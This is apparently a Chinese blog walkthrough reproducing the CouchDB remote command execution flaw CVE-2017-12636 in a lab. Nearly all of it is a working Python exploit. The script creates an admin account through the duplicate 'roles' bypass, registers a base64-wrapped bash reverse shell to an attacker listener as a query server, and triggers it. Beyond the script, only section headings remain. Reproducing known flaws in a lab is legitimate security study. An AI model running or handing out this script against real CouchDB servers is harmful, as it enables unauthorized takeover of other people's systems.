Couchdb 任意命令执行漏洞(CVE-2017-12636)
一、环境搭建
二、访问
三、构造payload
#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth
target = 'http://192.168.217.128:5984'??? # 目标ip
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机
version = 1
session = requests.session()
session.headers = {
??? 'Content-Type': 'application/json'
}
# session.proxies = {
#???? 'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
? "type": "user",
? "name": "wooyun",
? "roles": ["_admin"],
? "roles": [],
? "password": "wooyun"
}''')
session.auth = HTTPBasicAuth('wooyun', 'wooyun')
command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
??? session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
??? host = session.get(target + '/_membership').json()['all_nodes'][0]
??? session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))
session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')
if version == 1:
??? session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
??? session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')
四、开启监听
五、运行脚本
六、查看效果
如上图所示即反弹shell成功!?
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!